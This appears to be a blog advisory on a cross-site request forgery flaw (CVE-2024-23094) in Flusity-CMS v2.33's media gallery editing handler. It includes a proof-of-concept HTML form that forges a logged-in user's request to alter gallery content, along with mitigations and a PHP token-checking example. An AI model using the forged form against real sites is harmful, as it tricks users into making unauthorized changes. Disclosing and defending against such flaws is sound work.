CVE-2024-23094 - Flusity-CMS v2.33 Cross-Site Request Forgery Vulnerability Exploitation: Bypassing CSRF Protection in Flusity-CMS v2.33 Component Info_Media_Gallery

A new Common Vulnerabilities and Exposures (CVE) entry has been published for Flusity-CMS v2.33, a popular Content Management System used for building and managing websites. The vulnerability, identified as CVE-2024-23094, is a Cross-Site Request Forgery (CSRF) issue, which makes it possible for an attacker to perform actions on the website on behalf of a logged-in user without that user's consent. This vulnerability affects the Info_Media_Gallery component and specifically the '/cover/addons/info_media_gallery/action/edit_addon_post.php' script. Through this post, we will cover the details of the vulnerability, associated risks, proof of concept, and potential mitigation strategies.

The Exploit

Cross-Site Request Forgery, also known as CSRF or XSRF, is a web security vulnerability that allows an attacker to induce users to perform actions they did not intend to. The attack works by including a link, form, or script in a page under the attacker's control that submits a request to another site; because the browser automatically attaches the user's session cookie to that request, the target site processes it as if the logged-in user had made it.

In the case of CVE-2024-23094, Flusity-CMS v2.33 was found lacking proper CSRF protection when handling POST requests in its '/cover/addons/info_media_gallery/action/edit_addon_post.php' component. This component deals with editing and updating media gallery addons on the website. The absence of CSRF protection means that an attacker could potentially manipulate users' media galleries without their consent or knowledge, leading to unauthorized changes in the content, layout, or design.

Proof of Concept

The following code snippet demonstrates a sample HTML form that exploits the CSRF vulnerability in CVE-2024-23094:

<html>
    <head>
        <title>CVE-2024-23094 - Flusity-CMS CSRF Exploit</title>
    </head>
    <body>
        <h1>Exploiting Flusity-CMS v2.33 CSRF Vulnerability</h1>
        <form action="http://<target>/cover/addons/info_media_gallery/action/edit_addon_post.php" method="POST">
            <input type="hidden" name="category_id" value="1" />
            <input type="hidden" name="media_id" value="100" />
            <input type="hidden" name="media_title" value="Malicious Title Change" />
            <input type="submit" value="Click here to update your media gallery!" onClick="alert('Media gallery updated successfully.');">
        </form>
    </body>
</html>

This HTML form, once loaded by a logged-in Flusity-CMS user, will send a POST request with malicious data to the '/cover/addons/info_media_gallery/action/edit_addon_post.php' component. Since there is no proper CSRF protection in place, the malicious changes will be successfully applied to the targeted media gallery.

You can find more information about this newly discovered vulnerability from the following sources:

- CVE-2024-23094 Official Listing
- National Vulnerability Database (NVD) Entry

Mitigation Strategies

While the Flusity-CMS developers work on a patch to address this CSRF vulnerability, here are some mitigation strategies that can help protect your website in the meantime:

1. Implement proper CSRF tokens for all sensitive actions in the CMS.
2. Review the access control settings for media galleries and limit the number of users with editing privileges.
3. Consider using a web application firewall (WAF) to monitor, filter, or block HTTP requests that might exploit the vulnerability.
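The following PHP is an added example written for this post; it is not Flusity-CMS code and not a patch from the project. It shows what the first mitigation (a synchronizer CSRF token) looks like for a form handler with the shape the Exploit section describes: the vulnerable handler trusts the session cookie alone, while the hardened handler rejects any POST that does not carry the per-session token, and the session cookie is additionally issued with SameSite=Lax as a second layer. The function names (csrf_token, csrf_field, csrf_valid, the two edit_addon_post_* handlers) and the update_media persistence placeholder are assumptions for illustration, not names from the CMS.

```php
<?php
// Added example, not Flusity-CMS code: synchronizer-token CSRF protection
// for a PHP form handler. All function and field names here are illustrative.

declare(strict_types=1);

// Defence in depth: a SameSite=Lax session cookie is not sent on cross-site
// POSTs, so a forged form from another origin arrives without a session.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,   // assumes the CMS is served over HTTPS
    'samesite' => 'Lax',
]);
session_start();

// Issue one random token per session and reuse it for every form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit token
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to render inside every state-changing form the CMS emits.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time comparison of the submitted token against the session copy.
function csrf_valid(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Placeholder for the CMS's own persistence logic (assumed; the real code
// would write to the database). Returns the record it would have stored.
function update_media(string $mediaId, string $title): array
{
    return ['media_id' => $mediaId, 'media_title' => $title];
}

// Vulnerable shape, matching what the advisory describes: any POST that
// arrives with a valid session cookie is applied, wherever it came from.
function edit_addon_post_vulnerable(array $post): array
{
    return update_media((string)($post['media_id'] ?? ''),
                        (string)($post['media_title'] ?? ''));
}

// Hardened shape: refuse to touch state unless the method is POST and the
// token matches. The 403 happens before any of the request data is used.
function edit_addon_post_hardened(array $post): array
{
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST' || !csrf_valid($post)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token.');
    }
    return update_media((string)($post['media_id'] ?? ''),
                        (string)($post['media_title'] ?? ''));
}

// Rendering the edit form: the token travels with the form, so a page on
// another origin cannot reproduce it.
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'GET') {
    echo '<form method="POST" action="edit_addon_post.php">'
        . csrf_field()
        . '<input type="hidden" name="media_id" value="100">'
        . '<input type="text" name="media_title">'
        . '<input type="submit" value="Save">'
        . '</form>';
} else {
    edit_addon_post_hardened($_POST);
}
```

Two details matter for this to actually close the hole: the comparison must use hash_equals rather than == so the check is not timing-dependent, and the token check must run before any write, not after. The SameSite cookie attribute on its own is not a substitute for the token, since older browsers and some top-level navigations do not enforce it.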

Conclusion

As a Flusity-CMS user, it's essential to stay informed about vulnerabilities like CVE-2024-23094 and take necessary precautions to secure your website. Implementing the recommended mitigation strategies can help protect your site until an official patch is available. Additionally, keeping your software up to date and maintaining regular backups can further improve your site's security.

Timeline

Published on: 02/22/2024 14:15:46 UTC
Last modified on: 08/01/2024 13:47:04 UTC